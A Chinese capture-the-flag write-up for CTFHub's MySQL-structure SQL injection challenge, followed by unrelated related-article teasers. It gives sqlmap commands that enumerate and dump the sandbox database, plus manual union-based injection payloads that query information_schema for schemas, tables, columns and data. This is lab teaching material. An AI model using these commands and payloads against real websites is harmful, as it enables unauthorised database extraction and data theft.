CTFHUB-SQL注入-MySQL结构

news2024/10/5 19:17:46

目录

sqlmap工具夺flag

查看数据库名

查看数据库中表名

查看第一个表中数据

查看第二个表的数据

手动注入

判断是否存在注入

判断字段数量

查询注入点

查询数据库版本

查询数据库名

查看所有数据库

查看表名

查看表中字段

查看表中数据

本题用到sqlmap工具,没有sqlmap工具点击🚀🚀🚀直达下载安装使用教程

sqlmap工具夺flag

查看数据库名

python sqlmap.py -u "http://challenge-f00a2b8be09c8ff3.sandbox.ctfhub.com:10800/?id=1" --current-db --batch

发现了数据库名是 sqli

查看数据库中表名

python sqlmap.py -u "http://challenge-f00a2b8be09c8ff3.sandbox.ctfhub.com:10800/?id=1" -D sqli --tables --batch

发现了2张表,从表名看不出端倪,采用土办法,挨着找

查看第一个表中数据

python sqlmap.py -u "http://challenge-f00a2b8be09c8ff3.sandbox.ctfhub.com:10800/?id=1" -D sqli -T news --dump --batch

并无flag的踪影

查看第二个表的数据

python sqlmap.py -u "http://challenge-f00a2b8be09c8ff3.sandbox.ctfhub.com:10800/?id=1" -D sqli -T ukedvyhohp --dump --batch

在这个表里发现了本题的 flag

手动注入

判断是否存在注入

and 1 = 1
and 1 = 2
or 1 = 1
or 1 = 2
?id=1' and 1' = 1'
?id=1' and 1' = 2'

判断字段数量

order by 1    #正常
order by 2    #正常
order by 3    #异常

查询注入点

1 union select 1,2    #8为异常无回显
-1 union select 1,2   #如果数据不存在数据库中,可以使用负号查找
0 union select 1,2    #如果数据不存在数据库中,也可以使用零查找

查询数据库版本

union select 1,version()

查询数据库名

union select 1,database()

查看所有数据库

#数据库自带的表information_schema,其中包含所有的数据库信息
#schema_name 数据库名称
union select 1,group_concat(schema_name)from information_schema.schemata

查看表名

#table_name 表格名称
union select 1,group_concat(table_name) from information_schema.tables where table_schema='表名'

查看表中字段

#column_name 字段名称
union select 1,group_concat(column_name) from information_schema.columns where table_schema='库名' and table_name='表名'

查看表中数据

union select 1,group_concat(字段名) from 库名.表名

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1817754.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

使用距离传感器数据预测驾驶路线(BOSCH)

使用距离传感器数据预测驾驶路线(BOSCH)

使用距离传感器数据预测驾驶路线 Werner Uhler, Michael Scherl and Bernd Lichtenberg Robert Bosch GmbH ABSTRACT 将距离传感器检测到的车辆分配到相对于本车的车道是未来驾驶辅助系统(如自适应巡航控制 (ACC))的一项重要且必要的任务。通过车辆前…
阅读更多...
企业ERP系统的核心目的是什么?

企业ERP系统的核心目的是什么?

如今,随着企业业务和规模的逐步扩大,传统的管理模式显然不能满足企业可持续发展的需要。如果不及时改变,很可能会被市场淘汰。ERP系统是当前企业信息管理的必要工具。它可以提高企业的办公效率,帮助企业摆脱传统管理的束缚&#x…
阅读更多...
论文阅读Rolling-Unet,卷积结合MLP的图像分割模型

论文阅读Rolling-Unet,卷积结合MLP的图像分割模型

这篇论文提出了一种新的医学图像分割网络Rolling-Unet,目的是在不用Transformer的前提下,能同时有效提取局部特征和长距离依赖性,从而在性能和计算成本之间找到良好的平衡点。 论文地址:https://ojs.aaai.org/index.php/AAAI/article/view/2…
阅读更多...
小红书评论爬取使用教程[八猪采集器]

小红书评论爬取使用教程[八猪采集器]

如何使用八猪采集器爬虫小红书评论, 以下是教程. 目录 1. 下载使用 2. 注册账号 3. 登录 4. 配置任务 5. 执行采集任务 6. 校验执行是否成功 7. 查询和操作评论数据 8. 导出评论数据 9. 下载软件 1. 下载使用 下载后解压缩到任意地址, 双击8zhu_collector.exe即可…
阅读更多...
15. STUN协议和ICE工作原理

15. STUN协议和ICE工作原理

NET介绍 NAT是一种地址转换技术,它可以将IP数据报文头中的IP地址转换为另一个IP地址,并通过转换端口号达到地址重用的目的。 在大多数网络环境中,我们都需要通过 NAT 来访问 Internet。 NAT作为一种缓解IPv4公网地址枯竭的过渡技术&#xff…
阅读更多...
UE4/UE5像素流送云推流|程序不稳定、弱网画面糊怎么办?

UE4/UE5像素流送云推流|程序不稳定、弱网画面糊怎么办?

看到不少反馈说像素流送技术在实际的应用中,存在一些问题,比如程序崩溃、画面模糊等。本文将探讨这些问题,并介绍点量云流软件提供了哪些有效的解决方案。 常见的像素流送技术问题 画面质量问题: 当快速操作UE模型或初次启动像素…
阅读更多...
Mongodb使用$pop删除数组中的元素

Mongodb使用$pop删除数组中的元素

学习mongodb,体会mongodb的每一个使用细节,欢迎阅读威赞的文章。这是威赞发布的第67篇mongodb技术文章,欢迎浏览本专栏威赞发布的其他文章。如果您认为我的文章对您有帮助或者解决您的问题,欢迎在文章下面点个赞,或者关…
阅读更多...
IDEA项目上传Github流程+常见问题解决

IDEA项目上传Github流程+常见问题解决

一、Github上创建仓库 项目创建好后如图所示 二、IDEA连接Github远程仓库 管理远程 复制远程地址 定义远程 登录Github 点击进入File->Settings->Version Control->Github登录自己的账号并勾上“√” 三、推送项目 点击推送 修改为main 点击确定,打开远程…
阅读更多...
Kimichat使用案例014:用kimichat自动批量重命名三体字幕文件(零代码编程)

Kimichat使用案例014:用kimichat自动批量重命名三体字幕文件(零代码编程)

文章目录 一、介绍二、字幕文件三、kimi输入内容四、kimi输出内容五、运行程序一、介绍 网上下载了Netflix的三体电视剧,但没有字幕,又从字幕网站下载了字幕文件,由于字幕文件和视频文件标题有差异,需要全部进行重命名。 二、字幕文件 从字幕网站下载了字幕文件如下: 三、…
阅读更多...
基于 Element UI 的高效前端表格模板开发

基于 Element UI 的高效前端表格模板开发

在前端开发中,表格展示和搜索功能是常见的需求之一。为了提高开发效率,我们可以通过创建一个可复用的表格模板来应对各种类似的场景。本文将分享一个基于 Element UI 的表格模板,它包含了搜索、分页和操作按钮等功能,可以作为未来…
阅读更多...
基于zemax的圆孔、矩形衍射、双缝干涉与自定义孔径面型应用分析

基于zemax的圆孔、矩形衍射、双缝干涉与自定义孔径面型应用分析

自学案例节选自某乎 1:圆孔、矩形衍射、双缝干涉与自定义孔径面型应用分析 讨论一些基本的光学衍射、干涉现象,在加深对光学知识理解的同时,重点介绍一下自定义孔径的用法,主要是为了对软件的运用更为了解,并不针对某…
阅读更多...
图说设计模式:单例模式

图说设计模式:单例模式

更多C学习笔记,关注 wx公众号:cpp读书笔记 5. 单例模式 单例模式 模式动机模式定义模式结构时序图代码分析模式分析实例优点缺点适用环境模式应用模式扩展总结 5.1. 模式动机 对于系统中的某些类来说,只有一个实例很重要,例如…
阅读更多...
Linux:多线程的操作

Linux:多线程的操作

多线程操作 进程与线程线程的创建 create_pthread创建线程池给线程传入对象的指针 线程等待 pthread_join退出线程 pthread_exit线程等待参数 retval 与 线程退出参数 retval 线程中断 pthread_cancel获取线程编号 pthread_self线程分离 pthread_detach 进程与线程 进程是资源…
阅读更多...
【学习笔记】Kali

【学习笔记】Kali

纯个人总结,有什么不对的地方欢迎指正。 笔记根据个人学习进度持续更新… 一、 认识Kali 基础了解 Kali是一套基于Debian发行版的一款操作系统。(这里讲一个误区,我以前一直以为kali就属于deepin下的操作系统,但是我知道deepin是…
阅读更多...
记录一下:vue3+antd-vue a-form包含a-table实现表格行内校验, 清除 指定行 指定字段 的校验

记录一下:vue3+antd-vue a-form包含a-table实现表格行内校验, 清除 指定行 指定字段 的校验

问题描述下: 目标VLAN值可以输入, 也可以点击后面的按钮进行弹窗选择。由于检验原因,光标失焦但是没有填写就会校验爆红,然后点击选择之后由于没有失焦过程没有触发校验,依然还是红的。这个时候就需要清除 目标VLAN值 …
阅读更多...
企业跨境文件传输的核心痛点,怎样保证稳定可靠的传输性能?

企业跨境文件传输的核心痛点,怎样保证稳定可靠的传输性能?

随着经济和国际贸易的发展,企业跨境文件传输日趋频繁,多个行业均存在高频且大量的跨境文件传输需求: 跨境电子商务: 跨境电商平台需要进行跨国的订单、支付和物流信息的传输,以便顺利完成交易和配送。涉及跨国企业的内…
阅读更多...
Python爬虫实战(实战篇)—18获取【小红书】首页信息写入Excel(仅用于学习-附完整版代码)

Python爬虫实战(实战篇)—18获取【小红书】首页信息写入Excel(仅用于学习-附完整版代码)

文章目录 专栏导读背景1、分析首页页面2、分析获取信息2-1,获取:笔记类型2-2,获取:标题2-3,获取:用户信息2-4,获取:用户ID2-5,获取:用户头像2-6,获取:文章连接完整代码总结专栏导读 文章名称链接Python爬虫实战(实战篇)—16获取【百度热搜】数据—写入Ecel(附完整…
阅读更多...
一篇文章看懂Redission原理

一篇文章看懂Redission原理

文章目录 ☃️可重入锁原理☃️锁重试和WatchDog机制☃️MutiLock原理 上一篇文章讲解了 Rediision的使用 ,这篇文章讲解其原理 ☃️可重入锁原理 在Lock锁中,他是借助于底层的一个voaltile的一个state变量来记录重入的状态的,比如当前没有人持有这把锁…
阅读更多...
Vue配置项之生命周期(组件生命周期)

Vue配置项之生命周期(组件生命周期)

Lifecycle Hooks 首先说明一下,本人是前端小学生级别的菜鸡,吐槽的话请口下留情,在评论区指出错误或者补充不足,我会很喜欢,互喷不会进步,相互指点才会。。。。谢谢大家啦 目录 Lifecycle Hooks 目录创建…
阅读更多...
指针的深入理解(3)(包括数组名的理解、一维数组传参的本质以及指针数组的相关知识及使用)

指针的深入理解(3)(包括数组名的理解、一维数组传参的本质以及指针数组的相关知识及使用)

文章目录 1 数组名的理解2 使用指针访问数组3 一维数组传参的本质4 指针数组5 指针数组的使用 1 数组名的理解 当我们运行以下代码&#xff1a; #include <stdio.h> int main() {int arr[10] { 0 };printf("%p\n", &arr[0]);printf("%p\n", a…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023